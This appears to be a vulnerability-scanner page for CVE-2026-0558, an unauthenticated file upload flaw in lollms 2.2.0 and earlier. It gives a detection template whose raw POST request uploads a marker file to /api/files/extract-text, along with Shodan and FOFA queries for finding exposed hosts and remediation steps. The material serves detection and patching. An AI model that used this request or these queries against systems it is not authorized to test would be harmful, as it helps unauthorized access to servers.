LolLMS <= 2.2.0 - Unauthenticated File Upload
CVE-2026-0558
Early Release
Description
A vulnerability in parisneo/lollms up to and including version 2.2.0 allows unauthenticated users to upload and process files through the /api/files/extract-text endpoint. The endpoint lacks the Depends(get_current_active_user) dependency used by other file-related APIs.
Severity
Critical
CVSS Score
9.8
Exploit Probability
2%
Affected Product
lollms
Published Date
May 21, 2026
Template Author
koungq
CVE-2026-0558.yaml
id: CVE-2026-0558
info:
name: LolLMS <= 2.2.0 - Unauthenticated File Upload
author: KoungQ
severity: critical
description: |
A vulnerability in parisneo/lollms up to and including version 2.2.0 allows unauthenticated users to upload and process files through the /api/files/extract-text endpoint. The endpoint lacks the Depends(get_current_active_user) dependency used by other file-related APIs.
impact: |
Unauthenticated remote attackers can invoke server-side file processing, which can lead to denial of service through resource exhaustion, information disclosure through processing responses or errors, and bypass of intended access controls.
remediation: |
Update to a patched version containing commit a6625dc83786ff21d109b0d545ca61b770607ef3 or later. Restrict unauthenticated access to /api/files/extract-text until the update is applied.
reference:
- https://github.com/parisneo/lollms/commit/a6625dc83786ff21d109b0d545ca61b770607ef3
- https://huntr.com/bounties/0a722001-89ce-4c91-b6a6-a55ee5ba2113
- https://nvd.nist.gov/vuln/detail/CVE-2026-0558
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2026-0558
epss-score: 0.01702
epss-percentile: 0.75456
cwe-id: CWE-287
metadata:
verified: true
max-request: 1
vendor: parisneo
product: lollms
shodan-query: http.html:"lollms"
fofa-query: body="lollms"
tags: cve,cve2026,lollms,auth-bypass,file-upload,intrusive
http:
- raw:
- |
POST /api/files/extract-text HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=----testFormBoundary{{randstr}}
------testFormBoundary{{randstr}}
Content-Disposition: form-data; name="file"; filename="{{randstr}}.txt"
Content-Type: text/plain
lollms-cve-2026-0558-{{randstr}}
------testFormBoundary{{randstr}}--
matchers:
- type: dsl
dsl:
- 'contains_all(body, "lollms-cve-2026-0558-{{randstr}}", "text_content":")'
- 'contains(content_type, "application/json")'
- 'status_code == 200'
condition: and
9.8Score
CVSS Metrics
CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVE ID:
cve-2026-0558
CWE ID:
cwe-287
Remediation Steps
Update to a patched version containing commit a6625dc83786ff21d109b0d545ca61b770607ef3 or later. Restrict unauthenticated access to /api/files/extract-text until the update is applied.